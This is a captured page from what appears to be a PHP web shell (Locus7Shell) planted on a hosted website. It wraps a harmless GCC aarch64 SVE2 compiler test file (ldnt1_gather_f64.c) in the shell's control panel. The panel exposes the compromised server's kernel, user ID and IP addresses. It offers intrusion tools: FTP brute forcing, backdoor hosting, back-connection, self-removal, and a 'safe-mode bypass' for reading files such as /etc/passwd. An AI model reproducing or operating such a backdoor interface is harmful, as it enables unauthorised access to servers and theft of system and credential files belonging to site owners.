Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve2/acle/asm/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     ldnt1_gather_f64.c (9.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-final { check-function-bodies "**" "" "-DCHECK_ASM" { target { ! ilp32 } } } } */

#include "test_sve_acle.h"

/*
** ldnt1_gather_f64_tied1:
**    ldnt1d    z0\.d, p0/z, \[z0\.d\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_f64_tied1, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_f64 (p0, z0),
             z0_res = svldnt1_gather_f64 (p0, z0))

/*
** ldnt1_gather_f64_untied:
**    ldnt1d    z0\.d, p0/z, \[z1\.d\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_f64_untied, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_f64 (p0, z1),
             z0_res = svldnt1_gather_f64 (p0, z1))

/*
** ldnt1_gather_x0_f64_offset:
**    ldnt1d    z0\.d, p0/z, \[z0\.d, x0\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_x0_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, x0),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, x0))

/*
** ldnt1_gather_m8_f64_offset:
**    mov    (x[0-9]+), #?-8
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_m8_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, -8),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, -8))

/*
** ldnt1_gather_0_f64_offset:
**    ldnt1d    z0\.d, p0/z, \[z0\.d\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_0_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 0),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 0))

/*
** ldnt1_gather_9_f64_offset:
**    mov    (x[0-9]+), #?9
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_9_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 9),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 9))

/*
** ldnt1_gather_10_f64_offset:
**    mov    (x[0-9]+), #?10
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_10_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 10),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 10))

/*
** ldnt1_gather_11_f64_offset:
**    mov    (x[0-9]+), #?11
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_11_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 11),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 11))

/*
** ldnt1_gather_12_f64_offset:
**    mov    (x[0-9]+), #?12
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_12_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 12),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 12))

/*
** ldnt1_gather_13_f64_offset:
**    mov    (x[0-9]+), #?13
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_13_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 13),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 13))

/*
** ldnt1_gather_14_f64_offset:
**    mov    (x[0-9]+), #?14
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_14_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 14),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 14))

/*
** ldnt1_gather_15_f64_offset:
**    mov    (x[0-9]+), #?15
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_15_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 15),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 15))

/*
** ldnt1_gather_16_f64_offset:
**    mov    (x[0-9]+), #?16
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_16_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 16),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 16))

/*
** ldnt1_gather_248_f64_offset:
**    mov    (x[0-9]+), #?248
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_248_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 248),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 248))

/*
** ldnt1_gather_256_f64_offset:
**    mov    (x[0-9]+), #?256
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_256_f64_offset, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_offset_f64 (p0, z0, 256),
             z0_res = svldnt1_gather_offset_f64 (p0, z0, 256))

/*
** ldnt1_gather_x0_f64_index:
**    lsl    (x[0-9]+), x0, #?3
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_x0_f64_index, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_index_f64 (p0, z0, x0),
             z0_res = svldnt1_gather_index_f64 (p0, z0, x0))

/*
** ldnt1_gather_m1_f64_index:
**    mov    (x[0-9]+), #?-8
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_m1_f64_index, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_index_f64 (p0, z0, -1),
             z0_res = svldnt1_gather_index_f64 (p0, z0, -1))

/*
** ldnt1_gather_0_f64_index:
**    ldnt1d    z0\.d, p0/z, \[z0\.d\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_0_f64_index, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_index_f64 (p0, z0, 0),
             z0_res = svldnt1_gather_index_f64 (p0, z0, 0))

/*
** ldnt1_gather_5_f64_index:
**    mov    (x[0-9]+), #?40
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_5_f64_index, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_index_f64 (p0, z0, 5),
             z0_res = svldnt1_gather_index_f64 (p0, z0, 5))

/*
** ldnt1_gather_31_f64_index:
**    mov    (x[0-9]+), #?248
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_31_f64_index, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_index_f64 (p0, z0, 31),
             z0_res = svldnt1_gather_index_f64 (p0, z0, 31))

/*
** ldnt1_gather_32_f64_index:
**    mov    (x[0-9]+), #?256
**    ldnt1d    z0\.d, p0/z, \[z0\.d, \1\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ldnt1_gather_32_f64_index, svfloat64_t, svuint64_t,
             z0_res = svldnt1_gather_u64base_index_f64 (p0, z0, 32),
             z0_res = svldnt1_gather_index_f64 (p0, z0, 32))

/*
** ldnt1_gather_x0_f64_s64offset:
**    ldnt1d    z0\.d, p0/z, \[z0\.d, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_x0_f64_s64offset, svfloat64_t, float64_t, svint64_t,
             z0_res = svldnt1_gather_s64offset_f64 (p0, x0, z0),
             z0_res = svldnt1_gather_offset (p0, x0, z0))

/*
** ldnt1_gather_tied1_f64_s64offset:
**    ldnt1d    z0\.d, p0/z, \[z0\.d, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_tied1_f64_s64offset, svfloat64_t, float64_t, svint64_t,
             z0_res = svldnt1_gather_s64offset_f64 (p0, x0, z0),
             z0_res = svldnt1_gather_offset (p0, x0, z0))

/*
** ldnt1_gather_untied_f64_s64offset:
**    ldnt1d    z0\.d, p0/z, \[z1\.d, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_untied_f64_s64offset, svfloat64_t, float64_t, svint64_t,
             z0_res = svldnt1_gather_s64offset_f64 (p0, x0, z1),
             z0_res = svldnt1_gather_offset (p0, x0, z1))

/*
** ldnt1_gather_x0_f64_u64offset:
**    ldnt1d    z0\.d, p0/z, \[z0\.d, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_x0_f64_u64offset, svfloat64_t, float64_t, svuint64_t,
             z0_res = svldnt1_gather_u64offset_f64 (p0, x0, z0),
             z0_res = svldnt1_gather_offset (p0, x0, z0))

/*
** ldnt1_gather_tied1_f64_u64offset:
**    ldnt1d    z0\.d, p0/z, \[z0\.d, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_tied1_f64_u64offset, svfloat64_t, float64_t, svuint64_t,
             z0_res = svldnt1_gather_u64offset_f64 (p0, x0, z0),
             z0_res = svldnt1_gather_offset (p0, x0, z0))

/*
** ldnt1_gather_untied_f64_u64offset:
**    ldnt1d    z0\.d, p0/z, \[z1\.d, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_untied_f64_u64offset, svfloat64_t, float64_t, svuint64_t,
             z0_res = svldnt1_gather_u64offset_f64 (p0, x0, z1),
             z0_res = svldnt1_gather_offset (p0, x0, z1))

/*
** ldnt1_gather_x0_f64_s64index:
**    lsl    (z[0-9]+\.d), z0\.d, #3
**    ldnt1d    z0\.d, p0/z, \[\1, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_x0_f64_s64index, svfloat64_t, float64_t, svint64_t,
             z0_res = svldnt1_gather_s64index_f64 (p0, x0, z0),
             z0_res = svldnt1_gather_index (p0, x0, z0))

/*
** ldnt1_gather_tied1_f64_s64index:
**    lsl    (z[0-9]+\.d), z0\.d, #3
**    ldnt1d    z0\.d, p0/z, \[\1, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_tied1_f64_s64index, svfloat64_t, float64_t, svint64_t,
             z0_res = svldnt1_gather_s64index_f64 (p0, x0, z0),
             z0_res = svldnt1_gather_index (p0, x0, z0))

/*
** ldnt1_gather_untied_f64_s64index:
**    lsl    (z[0-9]+\.d), z1\.d, #3
**    ldnt1d    z0\.d, p0/z, \[\1, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_untied_f64_s64index, svfloat64_t, float64_t, svint64_t,
             z0_res = svldnt1_gather_s64index_f64 (p0, x0, z1),
             z0_res = svldnt1_gather_index (p0, x0, z1))

/*
** ldnt1_gather_x0_f64_u64index:
**    lsl    (z[0-9]+\.d), z0\.d, #3
**    ldnt1d    z0\.d, p0/z, \[\1, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_x0_f64_u64index, svfloat64_t, float64_t, svuint64_t,
             z0_res = svldnt1_gather_u64index_f64 (p0, x0, z0),
             z0_res = svldnt1_gather_index (p0, x0, z0))

/*
** ldnt1_gather_tied1_f64_u64index:
**    lsl    (z[0-9]+\.d), z0\.d, #3
**    ldnt1d    z0\.d, p0/z, \[\1, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_tied1_f64_u64index, svfloat64_t, float64_t, svuint64_t,
             z0_res = svldnt1_gather_u64index_f64 (p0, x0, z0),
             z0_res = svldnt1_gather_index (p0, x0, z0))

/*
** ldnt1_gather_untied_f64_u64index:
**    lsl    (z[0-9]+\.d), z1\.d, #3
**    ldnt1d    z0\.d, p0/z, \[\1, x0\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ldnt1_gather_untied_f64_u64index, svfloat64_t, float64_t, svuint64_t,
             z0_res = svldnt1_gather_u64index_f64 (p0, x0, z1),
             z0_res = svldnt1_gather_index (p0, x0, z1))

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0073 ]--